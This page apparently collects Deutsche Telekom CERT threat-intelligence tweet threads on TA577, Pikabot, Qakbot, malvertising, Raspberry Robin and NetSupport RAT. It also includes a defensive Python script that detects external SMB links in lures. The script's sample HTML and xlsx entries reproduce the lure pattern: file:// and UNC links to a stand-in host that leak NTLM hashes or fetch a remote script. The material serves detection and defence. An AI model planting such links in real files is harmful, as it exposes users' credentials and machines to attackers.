Technical tweets for technical folks by Deutsche Telekom CERT, CTI, and DFIR.
#dfir #cyber #cert #cti #TelekomSecurity
Feb 28 • 7 tweets • 2 min read
🚨 On February 26th and 27th Telekom Security and Bayern-CERT observed threat actor #TA577 phishing campaigns. This time the actor is not spreading malware, but apparently uses NTLMv2 handshakes to steal user credentials/hashes. 🧵1/7
Victims received a zipped HTML document that would relay them to the attacker SMB server via the contained "file://..." link. ⚠️ Please note that if such a file is opened in Edge or Chrome, the browser connects to the attacker server without prompting for confirmation! 🧵2/7
Feb 16 • 4 tweets • 2 min read
⚠️ This week, threat actor #TA577 introduced a rather interesting new approach to distribute their #Pikabot malware. Victim users received an #Excel spreadsheet prompting them to click on the contained button to view "files from the cloud". 🧵1/4
Further inspection of the file reveals that the document contains a hyperlink 🔗 to a remote SMB share, which hosts a JavaScript file that triggers the Pikabot infection chain. 🧵2/4
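The two TA577 lures above share one mechanic: a link whose target is a remote SMB host (a "file://..." URL in the zipped HTML, a UNC hyperlink in the Excel sheet), so a triage step that pulls such targets out of a suspicious attachment and flags the ones pointing outside the network is useful for both. The script below is an added example and not Telekom Security's or Bayern-CERT's tooling; the sample HTML, the xlsx relationship snippet and the host 203.0.113.10 (a documentation address, not an observed indicator) are constructed, and the list of internal DNS suffixes is an assumption to adapt to your environment.

```python
import io
import ipaddress
import re
import zipfile

# Link forms that make Windows open an SMB connection when followed:
#   file://host/share/...   (URL form, e.g. in <a href> or <meta http-equiv="refresh">)
#   \\host\share\...        (UNC form, e.g. Office hyperlink targets)
# file:///C:/... (three slashes, local path) and \\?\ or \\.\ device paths are skipped.
FILE_URL_RE = re.compile(r"file://([^/\\\"'\s<>]+)(?=[/\\\"'\s<>]|$)", re.IGNORECASE)
UNC_RE = re.compile(r"\\\\([^/\\\"'\s<>?.][^/\\\"'\s<>]*)(?=[\\\"'\s<>]|$)")

# Assumption: RFC 1918, loopback and link-local ranges are "internal"; adapt as needed.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]
# Assumption: DNS suffixes that only resolve on the corporate network.
INTERNAL_SUFFIXES = (".local", ".internal", ".corp", ".lan")


def _hostname(token: str) -> str:
    """Strip userinfo, port and IPv6 brackets from a host token."""
    token = token.rsplit("@", 1)[-1]
    if token.startswith("["):
        return token[1:].split("]", 1)[0]
    return token.split(":", 1)[0]


def is_external(host: str) -> bool:
    """True if following a link to this host would leave the internal network."""
    h = _hostname(host).lower().rstrip(".")
    if h in ("", "localhost") or h.endswith(INTERNAL_SUFFIXES):
        return False
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        # Single-label names (NetBIOS/WINS, DNS suffix search list) resolve internally.
        return "." in h
    return not any(ip in net for net in INTERNAL_NETS)


def smb_targets(content: str) -> list[str]:
    """All hosts referenced via file:// URLs or UNC paths, deduplicated, in order."""
    found = [m.group(1) for m in FILE_URL_RE.finditer(content)]
    found += [m.group(1) for m in UNC_RE.finditer(content)]
    return list(dict.fromkeys(h.lower() for h in found))


def external_smb_targets(content: str) -> list[str]:
    """Only the hosts an SMB connection would reach over the Internet."""
    return [h for h in smb_targets(content) if is_external(h)]


def scan_bytes(data: bytes) -> list[str]:
    """Scan a raw lure: plain HTML/text, or a zip container (zipped HTML, .xlsx).
    Members are decoded as latin-1 so no byte sequence aborts the scan."""
    texts = []
    if data[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if not name.endswith("/"):
                    texts.append(zf.read(name).decode("latin-1"))
    else:
        texts.append(data.decode("latin-1"))
    return external_smb_targets("\n".join(texts))


def build_zip(members: dict[str, bytes]) -> bytes:
    """Helper to emulate a zipped attachment in memory (for demonstration only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed sample lure, not a real indicator: 203.0.113.0/24 is reserved for documentation.
SAMPLE_HTML = r"""<html><head>
<meta http-equiv="refresh" content="0; url=file://203.0.113.10/ta577/doc.zip">
</head><body>
<a href="https://example.com/invoice">Open invoice</a>
<a href="\\fileserver\public\invoice.pdf">Internal copy</a>
<a href="file:///C:/Users/Public/notes.html">Local copy</a>
</body></html>"""

# Constructed xlsx hyperlink relationship, in the form found in xl/worksheets/_rels/sheet1.xml.rels.
SAMPLE_RELS = (
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/'
    '2006/relationships/hyperlink" Target="file:///\\\\203.0.113.10\\share\\update.js" '
    'TargetMode="External"/>'
)

if __name__ == "__main__":
    print("HTML lure  :", external_smb_targets(SAMPLE_HTML))
    print("xlsx rels  :", external_smb_targets(SAMPLE_RELS))
    print("zipped HTML:", scan_bytes(build_zip({"invoice.html": SAMPLE_HTML.encode()})))
```

Because an .xlsx is itself a zip container, `scan_bytes` covers both campaigns with one code path: the hyperlink target sits in the worksheet's `_rels` part, and a zipped HTML attachment is read the same way. Any external host it reports is worth blocking outbound on TCP/445 and hunting for in proxy and firewall logs.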
Mar 24, 2023 • 6 tweets • 3 min read
#Qakbot threat actors are on fire 🔥 recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧵1/6
Qakbot's main initial access vector is still through malspam campaigns ✉️. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact with the message. 🧵2/6
Jan 20, 2023 • 7 tweets • 3 min read
⚠️ WARNING: There is currently a high volume of so-called #Malvertising attacks. Threat actors are placing ads in search engines like Google to distribute their malware payloads. 🧵1/7
Their fraudulent web pages mimic the look of legitimate download pages for common software products. For example, here is a search advertisement and the corresponding fake website pretending to offer the software GIMP. 🧵2/7
Nov 18, 2022 • 6 tweets • 3 min read
#Qakbot once again had some surprises 🎁 for us this week. See below for a brief overview of what we found. 🧵 1/6
First and foremost, #Qakbot seems to have departed from their usual use of LNK files to trigger execution. Instead they now present .vbs or .js files at the root folder of the disk image 💿. 🧵 2/6
Sep 2, 2022 • 12 tweets • 5 min read
Raspberry Robin is a malware that has been around for some time now and spreads via infected USB drives.
Here is what we have seen over the last 10 months. 🧵 1/12 #RaspberryRobin #malware via @lazy_daemon
@sekoia_io and @redcanary have already published excellent technical analyses of this malware, so we won't go into more detail about it.
🚨CAUTION🚨 : Attackers send invoice-themed emails impersonating German companies to deliver #NetSupport #RAT. 🐀 via @lazy_daemon 🧵1/5
Attached to the email is an HTML file which tries to download and execute malicious JavaScript code. 🧵2/5
May 6, 2022 • 10 tweets • 3 min read
Here are some lessons learned from our past engagements; see it as an easy checklist on what not to do. #LessonsLearned ✅
1) MFA (multi-factor authentication) not being fully implemented, or non-existent altogether
While some attackers steal MFA tokens, it is rare! 📱 #MFA